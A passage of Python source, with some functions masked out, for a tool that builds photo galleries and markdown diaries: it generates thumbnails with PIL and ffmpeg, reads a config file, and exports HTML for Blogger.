style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\n<mask token>\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n<mask token>\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n if html_name:\n if os.path.exists(html_name):\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\n<mask token>\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\n<mask token>\n\n\ndef date_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\n<mask token>\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\n<mask token>\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n<mask token>\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n return bydate\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\n<mask token>\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith(\n 'https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>',\n buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get('href')\n thumb = elem_a.img.get('src')\n online_images[os.path.basename(href)] = href, thumb\n online_videos = list()\n for match in re.finditer(\n '<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer,\n flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef getconfig(options, config_filename):\n\n\n class Section:\n pass\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n config = MyConfigParser()\n config.read(config_filename)\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source',\n 'github_pages', default=False)\n options.thumbnails.media_description = config.getboolean('thumbnails',\n 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails',\n 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails',\n 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails',\n 'threshold_htmlfiles', default=3)\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox',\n 'wheelNextPrev')\n\n\n<mask token>\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return 